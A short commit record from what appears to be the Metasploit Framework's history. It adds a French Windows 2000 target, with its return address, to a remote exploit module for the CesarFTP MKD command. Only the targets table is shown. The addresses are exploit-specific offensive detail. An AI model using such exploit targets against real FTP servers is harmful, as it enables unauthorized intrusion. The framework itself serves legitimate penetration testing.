add french target

git-svn-id: file:///home/svn/framework3/trunk@5257 4d416f70-5f16-0410-b530-b9f4589650da
unstable
fab 2007-12-31 16:57:56 +00:00
parent 2d5be3df04
commit 9994c385ee
1 changed files with 1 additions and 0 deletions

View File

@ -48,6 +48,7 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
'Targets' =>
[
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
[ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],
[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ],
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],
],